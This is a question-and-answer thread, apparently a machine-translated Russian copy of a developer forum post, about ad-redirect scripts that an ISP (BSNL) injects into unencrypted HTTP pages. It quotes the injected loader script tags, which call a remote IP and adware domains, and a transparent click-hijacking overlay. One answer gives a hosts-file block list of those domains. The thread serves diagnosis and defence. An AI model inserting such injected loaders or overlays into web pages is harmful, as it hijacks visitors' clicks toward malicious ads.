неизвестные скрипты запущены и перенаправляются при нажатии на неизвестные веб-страницы

Проблема: - Иногда, при нажатии на меню NAVBAR или на любом div на моем загрузочном сайте, он перенаправляет на рекламу или неизвестные ссылки на новой вкладке что-то вроде этого.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Импортированные ссылки из размещенного файла: -

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="#" onclick="location.href='https://fonts.googleapis.com/css?family=Montserrat'; return false;" rel="stylesheet" type="text/css">

    <link href="#" onclick="location.href='https://fonts.googleapis.com/css?family=Lato'; return false;" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="#" onclick="location.href='https://use.fontawesome.com/releases/v5.0.8/css/all.css'; return false;" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

Что я получил в инспекции: -

Я проверил свой код несколько раз, когда нет переадресации при нажатии на меню. Я не нашел ничего подозрительного... НО ТОГО, когда я получил ссылки перенаправления при нажатии, я проверил свой код в браузере, и я ясно вижу несколько источников сценариев, добавленных в мой файлы (можно видеть в режиме проверки только в браузерах). Они не написаны для моего кода. Неизвестные части моего кода...

1) ЗДЕСЬ. Следующие 2 скрипта заменяют скрипт js/jquery.min.js в теге head

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) Этот добавляется в тег тела сразу после того, как я импортировал google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) Это тоже в теге тела.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) При проверке ссылки перенаправления. Информация HEADERS: -

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

То, что я пробовал: -

Мой код чист, и нет сценария, который перенаправляет его куда-то. Возможно, мой браузер или Windows скомпрометированы. Я проверил сайт из 3-х браузеров EDGE, CHROME, FIREFOX.. получил такую же проблему. затем я обновился до Windows 10 с Win7 и сделал новую установку. Но ничего не случилось. Затем я подумал о том, чтобы спросить поддержку Hostgator, если сервер скомпрометирован, они ответили на все с их конца... Я установил malwarebytes и все программное обеспечение для его решения... но они просто уведомили, что chrome/firefox/Edge перенаправляет на исходящий идентификатор с некоторыми доменное имя в основном go.oclasrv.com и ничего не делать.

**

ЛЮБОЕ РЕШЕНИЕ???

**

ОБНОВИТЬ:-

Я получил аналогичную переадресацию на ссылку обратной связи с поддержкой Hostgator..

При замечении здесь доменное имя в строке заменяется на rateus.in zoneid = 1492761 - это то же самое, что и незащищенная связь, которую я открываю.. Также cb = xxxxxxxxxxxx и tm = xxxxxxxxxxx изменяется для разных ссылок, а fingerprint = c2VwLW5vLXJlZGlyZWN0 - это то же самое для всех ссылок я открыть.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

Моя ОС полностью обновлена до версии WIN10 pro, и я установил только Chrome без каких-либо плагинов...

Проблема не зависит от браузера, так как я получил те же результаты в EDGE и Firefox.

ЛЮБОЙ ЭКСПЕРТ JS, КОТОРЫЙ МОЖЕТ ПОМОЧЬ МЕНЯ ИЗ ЗДЕСЬ

Ответ 1

Это похоже на случай, когда интернет-провайдер внедряет файлы JavaScript. Вы случайно не пользуетесь широкополосной связью BSNL? В последние дни BSNL внедряет Adware на HTTP (не зашифрованные) сайты.

Единственное известное мне решение - разместить ваш сайт на https или сменить провайдера.

Ответ 2

Эта проблема, с которой вы сталкиваетесь, является серверной. Вероятно, что-то не так с вашим кодом, но на сервере заражено вредоносное ПО, впрыскивающее этот плохой код на ваш сайт.

Чтобы решить эту проблему, я сделаю резервную копию кода, который вы написали, измените свои пароли хостинга FTP, сотрите свой сервер и добавьте свой код обратно. Если это не решит проблему, я бы изменил хостинг-провайдеров.

Ответ 3

Если вы видите неизвестный скрипт, введенный из следующих IP-адресов, то это файл сценария, который вводится BSNL ISP.

61.0.245.90, 117.205.13.171

Эти скрипты вводятся только при посещении веб-сайтов HTTP. HTTPS включает в себя безопасность транспортного уровня, поэтому он не может быть подделан провайдером.

Файлы сценариев с этого IP-адреса являются всего лишь каналом, который загружает дальнейшие сценарии AD из разных сред AD. Большинство этих сред AD преследуют навязчивую рекламу путем угона пользовательских щелчков мыши, чтобы открыть их всплывающие окна.

BSNL оправдание для такой деятельности заключается в том, что она является особенностью для улучшения просмотра для своих подписчиков. Существует подробная запись, написанная на BSNL, в которой вводятся такие скрипты и как их остановить.

Ответ 4

Хороший улов!

Из-за плохой безопасности серверы BSNL изо дня в день повреждают или заражают вредоносными программами/вирусами.

Был naganoadigei.com был зарегистрирован явно для обслуживания вредоносных программ и перенаправления пользователей на фишинговые сайты.

Недавно, в феврале 2019 года, они решили проблему. Но, к сожалению, новый тип перенаправлений на основе рекламы обнаружил, что это был humparsi.com по состоянию на февраль 2019 года

Вы можете посмотреть, был ли сайт заражен или нет, посетив Sucuri


Кроме того, вы можете заблокировать исходящий запрос вашей автономной системой в DNS-записи.

Перейдите в %windir%\System32\drivers\etc отредактируйте файл hosts в режиме повышенных прав/с правами администратора и добавьте эти строки в файл hosts.

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

Вышеуказанные сайты не защищены с помощью SSL

Чтобы заблокировать определенный IP-адрес, вы делаете это, блокируя исходящие границы в брандмауэре

Чтобы уменьшить влияние или любые маловероятные неблагоприятные воздействия, вы можете заблокировать JavaScript, установив надстройки, такие как NoScript или ScriptSafe и HTTPS Everywhere.

Чтобы узнать, какое приложение использует IP-адрес с назначенным номером порта:

C:\Windows\system32>netstat -anob